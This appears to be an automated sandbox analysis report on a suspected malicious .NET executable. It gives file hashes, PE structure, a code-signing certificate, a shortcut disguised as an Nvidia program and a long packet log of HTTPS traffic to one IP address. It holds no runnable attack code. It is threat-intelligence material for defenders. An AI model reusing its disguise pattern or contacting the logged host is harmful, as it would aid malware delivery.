                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 13:28:43 2024, mtime=Fri Dec 20 13:28:43 2024, atime=Wed Dec 18 08:09:54 2024, length=8816544, window=hide
                                                          Category:modified
                                                          Size (bytes):695
                                                          Entropy (8bit):4.551796708683575
                                                          Encrypted:false
                                                          SSDEEP:12:8XcZ8i/qH83Q3hnd0zKzSIwOjAUOYEkjKlKmV:8cin2KzSFyAUOQjmKm
                                                          MD5:CB5936134D134BC91322A26DB1263C47
                                                          SHA1:1EE75B8F08D3B22F3AF01F4B2BF5492937965257
                                                          SHA-256:AAF78D781F4AED38EEF04420C42729BF0FBE25E645DA00A89BAF1E5FB8365FD0
                                                          SHA-512:F07DE3B6907D49DA741231BAF4A0C5C69EF12B2A37804D7DA9A51106B491131EC2D791251D07A106735888845E89ACDAA3F8AF525137A034B2099BF9D72FF0CC
                                                          Malicious:true
                                                          Preview:L..................F.... ....x.R....x.R.....,Q...............................P.O. .:i.....+00.../C:\...................b.1......Y.s..NVIDIA~1..J......Y.s.Y.s..........................NmA.N.v.i.d.i.a.-.4.8.0.0.1.....n.2......Y;I .NVIDIA~1.EXE..R......Y.s.Y.s....t.........................N.v.i.d.i.a.-.4.8.0.0.1...e.x.e.......O...............-.......N...........h..M.....C:\Nvidia-48001\Nvidia-48001.exe..8.....\.....\.....\.....\.....\.....\.....\.....\.....\.N.v.i.d.i.a.-.4.8.0.0.1.\.N.v.i.d.i.a.-.4.8.0.0.1...e.x.e.`.......X.......936905...........hT..CrF.f4... .......-...-$..hT..CrF.f4... .......-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):4.886843714036496
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:RcFBMph6zu.exe
                                                          File size:133'536 bytes
                                                          MD5:6b5c558a9c8728fdd47e7d8c20cab5ff
                                                          SHA1:2e3761639e85fe8143620d04f0f03e5b30207de4
                                                          SHA256:7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab
                                                          SHA512:4ec939af0c9b4ac2e3daefb23ba091d6363490c45e6ff999e595483b1079eecac09aa0d62a340cf5d246ef030e6a11275bede0de3119fcd15c8b3239959c705f
                                                          SSDEEP:3072:ixh9iQPz6TYcwoMEFBW1vxzXY8F+0FzWLRZl:G9D6TYcwoMEFBW1v87
                                                          TLSH:F5D350916CDF40CAF26787B02FC8FAFF05E6FAA5181E71BD60C1A6184771EC48851AB5
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.dg................................. ........@.. .......................@....... ....@................................
                                                          Icon Hash:2d361616e3ac6d39
                                                          Entrypoint:0x40ebde
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6764AB27 [Thu Dec 19 23:24:23 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Signature Valid:true
                                                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                          Signature Validation Error:The operation completed successfully
                                                          Error Number:0
                                                          Not Before, Not After
                                                          • 13/12/2024 16:10:46 14/12/2025 16:10:46
                                                          Subject Chain
                                                          • E=pagamentosdigitaais@gmail.com, CN=PAGAMENTOS DIGITAIS LTDA, O=PAGAMENTOS DIGITAIS LTDA, L=JOAO PESSOA, S=PARAIBA, C=BR, OID.1.3.6.1.4.1.311.60.2.1.3=BR, SERIALNUMBER=55.972.702/0001-29, OID.2.5.4.15=Private Organization
                                                          Version:3
                                                          Thumbprint MD5:FC24237D18BE5D7114AA3DCDAAE6AD6C
                                                          Thumbprint SHA-1:3C9DB92427EA2A17F23D86D1B5704C90C1949548
                                                          Thumbprint SHA-256:19BAF25862979BC0C7CB3971187128986BEB6DB4A4C6986B452A286850E570B0
                                                          Serial:0B98FD483EA0DD6E7C6A6317
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xeb880x53.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x10e48.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x1e0000x29a0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x220000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xcbe40xcc0060bcacee8ba2d89f0644c69afd53798bFalse0.19847196691176472data3.5523134104457434IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x100000x10e480x11000dea4a8d7dd41ef218d51c7dd3c5f8cf6False0.26286764705882354data4.584280638931634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x220000xc0x200381d30c51d76428ebab89337171b6482False0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x104200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.2592274931976813
                                                          RT_GROUP_ICON0x20c480x14data1.25
                                                          RT_VERSION0x101300x2ecdata0.43716577540106955
                                                          RT_MANIFEST0x20c600x1e4ASCII text, with CRLF line terminators0.5330578512396694
                                                          DLLImport
                                                          mscoree.dll_CorExeMain
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 15:28:24.324462891 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:24.324500084 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:24.324553967 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:24.327398062 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:24.327411890 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:25.777621984 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:25.777697086 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:25.779408932 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:25.779417038 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:25.779649973 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:25.810167074 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:25.855349064 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:26.321331024 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:26.321389914 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:26.321573019 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:26.321801901 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:26.321815968 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:26.321827888 CET49737443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:26.321835041 CET4434973734.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:26.366122007 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:26.366154909 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:26.366245985 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:26.366450071 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:26.366466045 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:27.807760954 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:27.808280945 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:27.808300018 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:27.808990955 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:27.808995962 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.533571959 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.533647060 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.533750057 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.533767939 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.581571102 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.643733025 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.643763065 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.643838882 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.643838882 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.664870977 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.665016890 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.723953962 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.724091053 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.772269011 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.772419930 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.802139997 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.802253008 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.826607943 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.826728106 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.851526022 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.851629972 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.885147095 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.885278940 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.901592970 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.901714087 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.915688992 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.915838957 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.929210901 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.929349899 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.947442055 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.947540998 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.959254980 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.959388018 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.972732067 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.972826958 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.987657070 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.987754107 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:28.998132944 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:28.998271942 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.007675886 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.007852077 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.016139984 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.016242981 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.026627064 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.026742935 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.056444883 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.056560993 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.062103033 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.062231064 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.070934057 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.071033955 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.141819000 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.141941071 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.146451950 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.146579027 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.150486946 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.150640011 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.154573917 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.154659033 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.158487082 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.158622980 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.163701057 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.163795948 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.167649031 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.167732954 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.172697067 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.172799110 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.177196980 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.177381992 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.180932045 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.181068897 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.185988903 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.186172962 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.192297935 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.192435026 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.237201929 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.237299919 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.250127077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.250225067 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.254379034 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.254450083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.258404970 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.258482933 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.332617044 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.332714081 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.335736990 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.335814953 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.338907957 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.339019060 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.341947079 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.342020035 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.345839024 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.345910072 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.348978043 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.349055052 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.352283955 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.352524996 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.355694056 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.355779886 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.359150887 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.359235048 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.362222910 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.362307072 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.365928888 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.366012096 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.369548082 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.369622946 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.372734070 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.372802019 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.433079958 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.433291912 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.442420006 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.442526102 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.446274996 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.446408033 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.449372053 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.449534893 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.525774956 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.525867939 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.528989077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.529092073 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.531636953 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.531872988 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.534543037 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.534706116 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.537724018 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.537805080 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.540360928 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.540555000 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.543173075 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.543245077 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.545598030 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.545732975 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.548958063 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.549144983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.551208019 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.551301003 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.554634094 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.554708004 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.557240009 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.557354927 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.622154951 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.622256994 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.634001017 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.634082079 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.637392044 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.637478113 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.640032053 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.640151978 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.717750072 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.717835903 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.720351934 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.720422983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.723468065 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.723526955 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.726083994 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.726155043 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.729043007 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.729125023 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.731447935 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.731523991 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.734796047 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.734889030 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.737276077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.737469912 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.740032911 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.740122080 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.743158102 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.743278027 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.745575905 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.745642900 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.748740911 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.748816013 CET49743443192.168.2.634.95.215.169
